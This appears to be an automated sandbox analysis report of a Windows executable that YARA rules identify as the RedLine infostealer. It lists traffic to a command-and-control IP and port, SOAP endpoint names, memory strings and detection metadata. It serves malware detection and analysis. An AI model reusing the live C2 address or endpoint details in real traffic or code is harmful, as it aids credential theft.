Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250
Source: unknown	TCP traffic detected without corresponding DNS query: 45.137.22.250

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.250:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.250:5
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.250:55615
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.137.22.250:55615/
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002FF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743045301.0000000005B14000.00000004.00000020.00020000.00000000.sdmp, ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743316362.0000000007322000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip
Source: ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ljMiHZ8MwZ.exe, ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: tmp96FD.tmp.2.dr, tmpD0D4.tmp.2.dr, tmpD0B3.tmp.2.dr, tmp971F.tmp.2.dr, tmp9762.tmp.2.dr, tmp9741.tmp.2.dr, tmp9752.tmp.2.dr, tmp9731.tmp.2.dr, tmp96FE.tmp.2.dr, tmpD103.tmp.2.dr, tmp970E.tmp.2.dr, tmp9720.tmp.2.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7348, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: ljMiHZ8MwZ.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_017AE714	0_2_017AE714
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05777D60	0_2_05777D60
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05770710	0_2_05770710
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05770703	0_2_05770703
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05777D43	0_2_05777D43
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05D4773C	0_2_05D4773C
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_05D48198	0_2_05D48198
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_0918E3C8	0_2_0918E3C8
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 0_2_0918FA70	0_2_0918FA70
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_013AE7B0	2_2_013AE7B0
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_013ADC90	2_2_013ADC90
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_06759630	2_2_06759630
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_06754468	2_2_06754468
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_0675D528	2_2_0675D528
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_06751210	2_2_06751210
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_06753320	2_2_06753320
Source: C:\Users\user\Desktop\ljMiHZ8MwZ.exe	Code function: 2_2_0675DA30	2_2_0675DA30

Source: ljMiHZ8MwZ.exe, 00000000.00000002.1743846238.0000000007910000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1740881931.000000000142E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000042A3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741731894.00000000041F8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1744242261.00000000090B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000002.1741421631.0000000003111000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000000.00000000.1685132825.0000000000E42000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCsdp.exe. vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefirefox.exe0 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamechrome.exe< vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXE.MUID vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameIEXPLORE.EXED vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\080904B0\\OriginalFilename vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.00000000031EC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsedge.exe> vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1876392407.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe, 00000002.00000002.1874957650.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs ljMiHZ8MwZ.exe
Source: ljMiHZ8MwZ.exe	Binary or memory string: OriginalFilenameCsdp.exe. vs ljMiHZ8MwZ.exe

Source: ljMiHZ8MwZ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.ljMiHZ8MwZ.exe.41f8af0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.ljMiHZ8MwZ.exe.4210910.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 2.2.ljMiHZ8MwZ.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
